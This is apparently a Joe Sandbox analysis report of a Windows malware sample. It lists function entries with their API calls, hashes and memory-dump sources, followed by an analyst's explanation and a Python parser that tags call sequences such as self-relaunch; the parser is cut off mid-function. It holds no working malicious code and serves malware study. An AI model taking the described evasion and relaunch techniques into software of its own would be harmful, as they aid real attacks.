Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
Yara matches
Similarity
• API ID: CodeInfoPageValidmemset
• String ID:
• API String ID: 703783727-0
• Opcode ID: a2b74ec6b56f4fd1bb42d268d048981a4065a41abb9520184a3cb1684c992875
• Instruction ID: 8516d235f666c73c55f83e143c763eb446f4683df26e841c74d3e3addc7fd180
• Opcode Fuzzy Hash: a2b74ec6b56f4fd1bb42d268d048981a4065a41abb9520184a3cb1684c992875
• Instruction Fuzzy Hash: 3231D520A292B19AD725CF74889437DBFA49B25318F0A41ABD881CF3D1C369CC49C761
APIs
• GetSystemTime.KERNEL32(?), ref: 02D26BD3
• sscanf.NTDLL ref: 02D26C00
• SystemTimeToFileTime.KERNEL32(?,00000000), ref: 02D26C19
• SystemTimeToFileTime.KERNEL32(?,00000000), ref: 02D26C27
• ExitProcess.KERNEL32 ref: 02D26C41
Memory Dump Source
• Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
Yara matches
Similarity
• API ID: Time$System$File$ExitProcesssscanf
• String ID:
• API String ID: 2533653975-0
• Opcode ID: aadf5676f7027d7b9e1150d64898f7b292d6df214c2b0f712edb9653bf63e1a7
• Instruction ID: f1ad978e3822a92217a98bbf55ed9685633675beab30facbe0d4eb11503deb7a
• Opcode Fuzzy Hash: aadf5676f7027d7b9e1150d64898f7b292d6df214c2b0f712edb9653bf63e1a7
• Instruction Fuzzy Hash: 0C21EDB5D04218AFCF08EFE4D9459EEB7BAFF58304F04952DE406A3250EB349608CBA5
APIs
• GetProcessHeap.KERNEL32(00000000,00000104), ref: 02D2809E
• RtlAllocateHeap.NTDLL(00000000), ref: 02D280A5
• RegOpenKeyExA.ADVAPI32(80000002,0064A1D4,00000000,00020119,?), ref: 02D280C5
• RegQueryValueExA.ADVAPI32(?,0064A4EC,00000000,00000000,000000FF,000000FF), ref: 02D280E6
• RegCloseKey.ADVAPI32(?), ref: 02D280F9
Memory Dump Source
• Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
Yara matches
Similarity
• API ID: Heap$AllocateCloseOpenProcessQueryValue
• String ID:
• API String ID: 3225020163-0
• Opcode ID: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
• Instruction ID: 8a8039f243166a3fa07d00a7cfb043ca8053f9946ea46465296370eaef0093bf
• Opcode Fuzzy Hash: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
• Instruction Fuzzy Hash: 10116DB5A84219BBD710CFD4DD4AFABB7B9EB45701F104219F615A7280C7746804CBA1
APIs
• GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417E37
• HeapAlloc.KERNEL32(00000000), ref: 00417E3E
• RegOpenKeyExA.ADVAPI32(80000002,02E32770,00000000,00020119,?), ref: 00417E5E
• RegQueryValueExA.ADVAPI32(?,02E3A4F0,00000000,00000000,000000FF,000000FF), ref: 00417E7F
• RegCloseKey.ADVAPI32(?), ref: 00417E92
Memory Dump Source
• Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
Yara matches
Similarity
• API ID: Heap$AllocCloseOpenProcessQueryValue
• String ID:
• API String ID: 3466090806-0
• Opcode ID: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
• Instruction ID: f35b37edc560d93cca1bbeb044924e1a71a0ba88b9c12cde0d27c4035fcf8d53
• Opcode Fuzzy Hash: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
• Instruction Fuzzy Hash: 01114CB5A84205FFD710CFD4DD4AFBBBBB9EB09B10F10425AF605A7280D77858018BA6
APIs
• GetProcessHeap.KERNEL32(00000000,00000104), ref: 02D2799B
• RtlAllocateHeap.NTDLL(00000000), ref: 02D279A2
• RegOpenKeyExA.ADVAPI32(80000002,0064A398,00000000,00020119,02D27920), ref: 02D279C2
• RegQueryValueExA.ADVAPI32(02D27920,00420AAC,00000000,00000000,?,000000FF), ref: 02D279E1
• RegCloseKey.ADVAPI32(02D27920), ref: 02D279EB
Memory Dump Source
• Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
Yara matches
Similarity
• API ID: Heap$AllocateCloseOpenProcessQueryValue
• String ID:
• API String ID: 3225020163-0
• Opcode ID: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
• Instruction ID: edecfb0f795a99a83c989b19916f8da936b096ca258598319a66df5faa4f8f1d
• Opcode Fuzzy Hash: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
• Instruction Fuzzy Hash: FB01FFB9A80308BFEB10DFE4DC4AFAEB7B9EB48705F104559FA05A7280D6759A048F51
APIs
• StrStrA.SHLWAPI(02E39C38,?,?,?,0041140C,?,02E39C38,00000000), ref: 0041926C
• lstrcpyn.KERNEL32(0064AB88,02E39C38,02E39C38,?,0041140C,?,02E39C38), ref: 00419290
• lstrlenA.KERNEL32(?,?,0041140C,?,02E39C38), ref: 004192A7
• wsprintfA.USER32 ref: 004192C7
Strings
Memory Dump Source
• Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
Yara matches
Similarity
• API ID: lstrcpynlstrlenwsprintf
• String ID: %s%s
• API String ID: 1206339513-3252725368
• Opcode ID: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
• Instruction ID: a59194731e19cd62a1114d9db51b1d7a77f87ed08144ed5303bdb74f02b8d175
• Opcode Fuzzy Hash: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
• Instruction Fuzzy Hash: FD010879580108FFCB04DFECC998EAE7BBAEB49394F108548F9098B300C635AA40DB95
APIs
• GetProcessHeap.KERNEL32(00000000,00000104), ref: 02D1151B
• RtlAllocateHeap.NTDLL(00000000), ref: 02D11522
• RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 02D1153E
• RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 02D1155C
• RegCloseKey.ADVAPI32(?), ref: 02D11566
Memory Dump Source
• Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
Yara matches
Similarity
• API ID: Heap$AllocateCloseOpenProcessQueryValue
• String ID:
• API String ID: 3225020163-0
• Opcode ID: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
• Instruction ID: a893e90dad43f4577cb7dd9c2ac56e71d52aa8d239d3a19c4244d9ff0260fe31
• Opcode Fuzzy Hash: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
• Instruction Fuzzy Hash: 4A01CDBDA40208BFDB14DFE4DC49FAEB7B9EB48705F108159FA0597280D6759A018F91
                                                                                    APIs
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 004012BB
                                                                                    • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
                                                                                    • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 004012FF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                    • String ID:
                                                                                    • API String ID: 3466090806-0
                                                                                    • Opcode ID: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                                                                    • Instruction ID: a780f69aac564b2d92452564e57f3177c1920ebdf93c56c18a8360c70aaf8c3d
                                                                                    • Opcode Fuzzy Hash: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                                                                    • Instruction Fuzzy Hash: 000131BDA40208BFDB10DFE0DC49FAEB7BDEB48701F008159FA05A7280D6749A018F51
                                                                                    APIs
                                                                                    • __getptd.LIBCMT ref: 02D2C9B5
                                                                                      • Part of subcall function 02D2C206: __getptd_noexit.LIBCMT ref: 02D2C209
                                                                                      • Part of subcall function 02D2C206: __amsg_exit.LIBCMT ref: 02D2C216
                                                                                    • __getptd.LIBCMT ref: 02D2C9CC
                                                                                    • __amsg_exit.LIBCMT ref: 02D2C9DA
                                                                                    • __lock.LIBCMT ref: 02D2C9EA
                                                                                    • __updatetlocinfoEx_nolock.LIBCMT ref: 02D2C9FE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                    • String ID:
                                                                                    • API String ID: 938513278-0
                                                                                    • Opcode ID: 9141d4d236c8230aa4afe5b4a9d8ccb2514574f5d49c72fbeb20a3e596f06de6
                                                                                    • Instruction ID: c12c1d6a1adac73d78cffcfb292747c051df9ecc1b1faf85bef4e991c56101a1
                                                                                    • Opcode Fuzzy Hash: 9141d4d236c8230aa4afe5b4a9d8ccb2514574f5d49c72fbeb20a3e596f06de6
                                                                                    • Instruction Fuzzy Hash: A9F096319547309BD720B7A8540271D33A1EF3076DF12810BD414B73D0DB645D48DFA9
                                                                                    APIs
                                                                                    • __getptd.LIBCMT ref: 0041C74E
                                                                                      • Part of subcall function 0041BF9F: __getptd_noexit.LIBCMT ref: 0041BFA2
                                                                                      • Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF
                                                                                    • __getptd.LIBCMT ref: 0041C765
                                                                                    • __amsg_exit.LIBCMT ref: 0041C773
                                                                                    • __lock.LIBCMT ref: 0041C783
                                                                                    • __updatetlocinfoEx_nolock.LIBCMT ref: 0041C797
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                    • String ID:
                                                                                    • API String ID: 938513278-0
                                                                                    • Opcode ID: 97b8e5648014eb75fe7e4c2f5c52bbac28816c25018f37e92348e0e4551f1163
                                                                                    • Instruction ID: 4c6ecd523783b942696bdc62fd612c852c6eee159b5b032e672b771ca3e86784
                                                                                    • Opcode Fuzzy Hash: 97b8e5648014eb75fe7e4c2f5c52bbac28816c25018f37e92348e0e4551f1163
                                                                                    • Instruction Fuzzy Hash: B0F09632A813119BD7207BB95C467DE33A09F00728F24414FF414A62D2CBAC59D28E9E
                                                                                    APIs
                                                                                    • StrCmpCA.SHLWAPI(00000000,02E35D40), ref: 0041079A
                                                                                    • StrCmpCA.SHLWAPI(00000000,02E35D00), ref: 00410866
                                                                                    • StrCmpCA.SHLWAPI(00000000,02E35E10), ref: 0041099D
                                                                                      • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcpy
                                                                                    • String ID: `_A
                                                                                    • API String ID: 3722407311-2339250863
                                                                                    • Opcode ID: ad8dc5e93b182d36aa8816b13cb8526b02303e3c68790e1ea0db99ee73ed39a9
                                                                                    • Instruction ID: 94d948ae3f98129d28702617e668470e7ead908e0178ded6cd69974dbc9b1d9a
                                                                                    • Opcode Fuzzy Hash: ad8dc5e93b182d36aa8816b13cb8526b02303e3c68790e1ea0db99ee73ed39a9
                                                                                    • Instruction Fuzzy Hash: 3991C975A101089FCB28EF65D991BED77B5FF94304F40852EE8099F281DB349B46CB86
                                                                                    APIs
                                                                                    • StrCmpCA.SHLWAPI(00000000,02E35D40), ref: 0041079A
                                                                                    • StrCmpCA.SHLWAPI(00000000,02E35D00), ref: 00410866
                                                                                    • StrCmpCA.SHLWAPI(00000000,02E35E10), ref: 0041099D
                                                                                      • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcpy
                                                                                    • String ID: `_A
                                                                                    • API String ID: 3722407311-2339250863
                                                                                    • Opcode ID: 4f314794acc433d264edb91db9a4cba44b198df7345ecddf4fe998b3cfc938e1
                                                                                    • Instruction ID: eaeb4c1bfeb24d12610814888c89f1e8d39eb2be5be33b2b9933dc38047eb686
                                                                                    • Opcode Fuzzy Hash: 4f314794acc433d264edb91db9a4cba44b198df7345ecddf4fe998b3cfc938e1
                                                                                    • Instruction Fuzzy Hash: 6081BA75B101049FCB18EF65C991AEDB7B6FF94304F50852EE8099F281DB349B46CB86
                                                                                    APIs
                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 02D268CA
                                                                                      • Part of subcall function 02D2A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D2A9EF
                                                                                      • Part of subcall function 02D2AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02D2AC2C
                                                                                      • Part of subcall function 02D2AC17: lstrcpy.KERNEL32(00000000), ref: 02D2AC6B
                                                                                      • Part of subcall function 02D2AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02D2AC79
                                                                                      • Part of subcall function 02D2AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02D2AB6C
                                                                                    • ShellExecuteEx.SHELL32(0000003C), ref: 02D2698D
                                                                                    • ExitProcess.KERNEL32 ref: 02D269BC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                                                                    • String ID: <
                                                                                    • API String ID: 1148417306-4251816714
                                                                                    • Opcode ID: 4ae30b859fc942c9587f152936d11ec8aa2d9d08854ccb4cb357e31b47128d92
                                                                                    • Instruction ID: eb9ac6147698b877368ae11da7b6e0a652d4af41beee0cb5ef31de3eecc35bb7
                                                                                    • Opcode Fuzzy Hash: 4ae30b859fc942c9587f152936d11ec8aa2d9d08854ccb4cb357e31b47128d92
                                                                                    • Instruction Fuzzy Hash: 9A3178B1800228ABDB14EF90CD94FDEB77AEF24304F405198E205A2290DF746F88CF69
                                                                                    APIs
                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00416663
                                                                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                                                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                                                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00416726
                                                                                    • ExitProcess.KERNEL32 ref: 00416755
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                                                                    • String ID: <
                                                                                    • API String ID: 1148417306-4251816714
                                                                                    • Opcode ID: 5c242e9f6f242afdfd3d50008aa43d31dcc14585de71cbfc0ed53ce080c09176
                                                                                    • Instruction ID: 5b5f5c47f0bfa9475b258acd8296b8f4f2330d650783268263d73b7fdd640aa3
                                                                                    • Opcode Fuzzy Hash: 5c242e9f6f242afdfd3d50008aa43d31dcc14585de71cbfc0ed53ce080c09176
                                                                                    • Instruction Fuzzy Hash: 7F314AB1C01208ABDB14EB91DD82FDEB778AF04314F40518EF20966191DF786B89CF6A
                                                                                    APIs
                                                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                                                    • lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcatlstrcpy
                                                                                    • String ID: vI@$vI@
                                                                                    • API String ID: 3905823039-1245421781
                                                                                    • Opcode ID: 944da6e453fcb66f0d11250dd24ec57f51aa285ffba2b214b4798455d692dd31
                                                                                    • Instruction ID: 271a46469eabd2290b2e3c410fce444a88fb87627d9bf606efbbe474ae7d75ee
                                                                                    • Opcode Fuzzy Hash: 944da6e453fcb66f0d11250dd24ec57f51aa285ffba2b214b4798455d692dd31
                                                                                    • Instruction Fuzzy Hash: F011E878901108EFCB05EF94D885AEEB3B5FF49314F108599E825AB391C734AE92CF95
                                                                                    APIs
                                                                                    • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0041951E,00000000), ref: 00418D5B
                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,0041951E,00000000), ref: 00418D62
                                                                                    • wsprintfW.USER32 ref: 00418D78
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heap$AllocProcesswsprintf
                                                                                    • String ID: %hs
                                                                                    • API String ID: 659108358-2783943728
                                                                                    • Opcode ID: 308207b7b7d6c7c9756ec14eecfab78ddd1d2e288a316a00ead5d509718cb0e2
                                                                                    • Instruction ID: e0c39cc4b97fe4de81499882959c588a1d03a161ade5b5bfa375175f6a3fb920
                                                                                    • Opcode Fuzzy Hash: 308207b7b7d6c7c9756ec14eecfab78ddd1d2e288a316a00ead5d509718cb0e2
                                                                                    • Instruction Fuzzy Hash: 96E08CB8A80208BFC710DBD4EC0AE697BB8EB05702F000194FE0A87280DA719E008B96
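The function entries above carry more than the Joe Sandbox summary shows at a glance: the registry-read routine at 004012B4 and the one at 02D11522 share the Opcode ID fa554e10..., so the same function exists once in the loaded image (dump base 00400000, "based on PE: true") and once in the runtime-mapped 02D10000 region ("based on PE: false"), which matches the unpacking signatures in the overview. The samDesired value 00020119 passed to RegOpenKeyExA decodes to KEY_READ | KEY_WOW64_64KEY, the 80000001 captured on the stack just before it is HKEY_CURRENT_USER, and the GetModuleFileNameA, ShellExecuteEx, ExitProcess chain at 00416663 is a process relaunching itself from its own path and then terminating. The helper below is an added example for this report page, not Joe Sandbox's code and not code from the sample: it parses the page's own "• API.MODULE(args), ref: ADDR" lines into per-function API sequences, decodes those constants (names taken from the Windows SDK headers), tags a few call orderings with labels that are this example's own, and pairs entries by Opcode ID. SAMPLE copies three entries from the page verbatim.

```python
# Added analyst helper for this report page (not Joe Sandbox code and not the sample's code):
# parse the "• API.MODULE(args), ref: ADDR" entries above into ordered API sequences, decode
# a few registry constants and tag behaviour.  SAMPLE copies three entries from the page;
# the pattern labels are this example's own, the constant names come from the Windows SDK.
import re

SAMPLE = """\
APIs
• GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
• HeapAlloc.KERNEL32(00000000), ref: 004012BB
• RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
• RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
• RegCloseKey.ADVAPI32(?), ref: 004012FF
• Opcode ID: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
APIs
• RtlAllocateHeap.NTDLL(00000000), ref: 02D11522
• RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 02D1153E
• RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 02D1155C
• RegCloseKey.ADVAPI32(?), ref: 02D11566
• Opcode ID: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
APIs
• GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00416663
  • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
• ShellExecuteEx.SHELL32(0000003C), ref: 00416726
• ExitProcess.KERNEL32 ref: 00416755
• Opcode ID: 5c242e9f6f242afdfd3d50008aa43d31dcc14585de71cbfc0ed53ce080c09176
"""

CALL_RE = re.compile(r"•\s*(\w+)\.(\w+)(?:\(([^)]*)\))?,?\s*ref:\s*([0-9A-Fa-f]+)")
OPCODE_RE = re.compile(r"•\s*Opcode ID:\s*([0-9a-f]{64})")
HKEY_ROOTS = {0x80000001: "HKEY_CURRENT_USER", 0x80000002: "HKEY_LOCAL_MACHINE"}  # winreg.h
KEY_READ, KEY_WOW64_64KEY, KEY_WOW64_32KEY = 0x20019, 0x0100, 0x0200  # winnt.h
PATTERNS = {  # an entry gets a tag when its own calls contain these APIs in this order (gaps allowed)
    "registry_value_read": ["RegOpenKeyExA", "RegQueryValueExA", "RegCloseKey"],
    "self_relaunch_then_exit": ["GetModuleFileNameA", "ShellExecuteEx", "ExitProcess"],
    "copy_then_delete_file": ["CopyFileA", "DeleteFileA"],
}

def hexarg(arg):
    """Arguments are zero-padded hex, or '?' when Joe could not capture them."""
    arg = arg.strip()
    return int(arg, 16) if re.fullmatch(r"[0-9A-Fa-f]{1,8}", arg) else None

def decode_sam(sam):
    """RegOpenKeyEx samDesired mask, e.g. 0x20119 -> 'KEY_READ|KEY_WOW64_64KEY'."""
    names = []
    for mask, name in ((KEY_READ, "KEY_READ"), (KEY_WOW64_64KEY, "KEY_WOW64_64KEY"),
                       (KEY_WOW64_32KEY, "KEY_WOW64_32KEY")):
        if (sam & mask) == mask:
            names.append(name)
            sam &= ~mask
    return "|".join(names + ([hex(sam)] if sam else []))  # unnamed leftover bits, if any

def is_subsequence(needle, hay):
    it = iter(hay)
    return all(any(x == item for item in it) for x in needle)

def parse_entries(text):
    """Split at each 'APIs' header; indented 'Part of subcall' lines belong to callees."""
    entries, cur = [], None
    for line in text.splitlines():
        s = line.strip()
        if s == "APIs":
            cur = {"calls": [], "opcode_id": None}
            entries.append(cur)
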